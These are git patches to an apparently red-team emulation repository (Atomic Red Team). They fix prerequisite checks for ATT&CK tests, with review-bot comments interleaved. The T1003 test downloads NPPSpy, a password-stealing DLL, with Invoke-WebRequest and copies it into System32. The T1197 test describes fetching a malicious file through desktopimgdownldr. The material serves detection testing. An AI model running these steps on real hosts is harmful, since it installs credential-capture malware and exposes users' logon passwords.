diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 86e316cf..033b7eb6 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -83,6 +83,7 @@ atomic_tests: del #{local_file} >nul 2>&1 name: command_prompt - name: Bits download using destktopimgdownldr.exe (cmd) + auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 description: | This test simulates using destopimgdwnldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 16301ed5..c1428715 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -567,3 +567,4 @@ db020456-125b-4c8b-a4a7-487df8afb5a2 804f28fc-68fc-40da-b5a2-e9d0bce5c193 a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 9636dd6e-7599-40d2-8eee-ac16434f35ed +afb5e09e-e385-4dee-9a94-6ee60979d114 From 85f4f0ec3f7213c9d19905458b593c68fb10aef6 Mon Sep 17 00:00:00 2001 From: Laken Harrell Date: Thu, 20 Aug 2020 15:37:47 -0500 Subject: [PATCH 16/19] fixed prereq_command (#1205) Co-authored-by: Harrell Co-authored-by: Carrie Roberts --- atomics/T1046/T1046.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index 3c64514c..76b80f16 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -71,7 +71,7 @@ atomic_tests: dependencies: - description: | NMap must be installed - prereq_command: 'if (cmd /c nmap 2>nul) {exit 0} else {exit 1}' + prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}' get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} Start-Process $env:temp\nmap-7.80-setup.exe /S From 1411b5ec4a06ea5570c9431d4b41121fd42d8d7d Mon Sep 17 00:00:00 2001 
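Review bot: The corrected `prereq_command` in the T1046.yaml hunk, `if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}`, decides presence by whether `nmap` printed anything to stdout, which means it actually executes the tool for a check and depends on nmap's no-argument usage output going to stdout. A plain resolution test, `if (Get-Command nmap -ErrorAction SilentlyContinue) {exit 0} else {exit 1}`, expresses the intent directly and matches the `Test-Path` style used by other prereq checks in this series; both forms see the same PATH, so a session started before the installer ran will fail either way until PATH is refreshed, which may be worth a sentence in the dependency description.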
From: CircleCI Atomic Red Team doc generator Date: Thu, 20 Aug 2020 20:38:40 +0000 Subject: [PATCH 17/19] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/index.yaml | 2 +- atomics/T1046/T1046.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 52dc0d30..381ee6c8 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -38989,7 +38989,7 @@ discovery: - description: 'NMap must be installed ' - prereq_command: if (cmd /c nmap 2>nul) {exit 0} else {exit 1} + prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} Start-Process $env:temp\nmap-7.80-setup.exe /S diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 386cb316..76b28f50 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -120,7 +120,7 @@ nmap #{host_to_scan} ##### Description: NMap must be installed ##### Check Prereq Commands: ```powershell -if (cmd /c nmap 2>nul) {exit 0} else {exit 1} +if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell From f7584be904dd92854ce9a18b11cf0572a017d3ae Mon Sep 17 00:00:00 2001 From: Geoff Galitz Date: Thu, 20 Aug 2020 21:40:09 +0100 Subject: [PATCH 18/19] T1003 NPPSPY GetPrereqs location fix (#1202) * Before: NPPSPY is installed into atomics src directories, test looks for it in the local temp directory resulting in an error. After: Test is changed to look for NPPSPY directly in atomics src directory * Change test to install prereq to local temp directory and work from there. Co-authored-by: Carrie Roberts --- atomics/T1003/T1003.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 982a43a7..2374e2ae 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml 
@@ -77,11 +77,10 @@ atomic_tests: - windows dependency_executor_name: powershell dependencies: - - description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory - prereq_command: if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll") {exit 0} else {exit 1} + - description: NPPSpy.dll must be available in local temp directory + prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} get_prereq_command: |- - $rv = mkdir PathToAtomicsFolder\T1003\bin - Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll" + Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll" executor: command: |- Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32" @@ -103,4 +102,4 @@ atomic_tests: Remove-Item C:\NPPSpy.txt -ErrorAction Ignore Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true From 04a409832e83b12ef33b044ee9afc2d004d5a121 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 20 Aug 2020 20:40:34 +0000 Subject: [PATCH 19/19] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/index.yaml | 11 +++++------ atomics/T1003/T1003.md | 7 +++---- 2 files changed, 8 insertions(+), 10 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 381ee6c8..8d1ef367 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
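Review bot: The new `prereq_command` only checks that `$env:Temp\NPPSPY.dll` exists, and the executor's `Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"` then moves that file into System32 with nothing verifying its contents; since the download URL is already pinned to a specific commit, a hash check is cheap and closes the gap between fetch and install, e.g. `if ((Test-Path "$env:Temp\NPPSPY.dll") -and ((Get-FileHash "$env:Temp\NPPSPY.dll").Hash -eq "<KNOWN_GOOD_SHA256>")) {exit 0} else {exit 1}` with the placeholder replaced by the hash of the pinned artifact. `$env:Temp` is per-user, so a prereq satisfied by one account will not be found when the test is run as another; the description `NPPSpy.dll must be available in local temp directory` could say so. The cleanup lines visible in the second hunk remove `C:\NPPSpy.txt` and `C:\Windows\System32\NPPSpy.dll` but not the temp copy, which is presumably deliberate for prereqs but worth confirming since it leaves a credential-capture DLL on disk.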
@@ -19629,12 +19629,11 @@ credential-access: - windows dependency_executor_name: powershell dependencies: - - description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory - prereq_command: if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll") - {exit 0} else {exit 1} - get_prereq_command: |- - $rv = mkdir PathToAtomicsFolder\T1003\bin - Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll" + - description: NPPSpy.dll must be available in local temp directory + prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit + 1} + get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll + -OutFile "$env:Temp\NPPSPY.dll" executor: command: |- Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32" diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 30be8e5c..f86d38f3 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md 
@@ -145,15 +145,14 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore #### Dependencies: Run with `powershell`! -##### Description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory +##### Description: NPPSpy.dll must be available in local temp directory ##### Check Prereq Commands: ```powershell -if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll") {exit 0} else {exit 1} +if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell -$rv = mkdir PathToAtomicsFolder\T1003\bin -Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll" +Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll" ```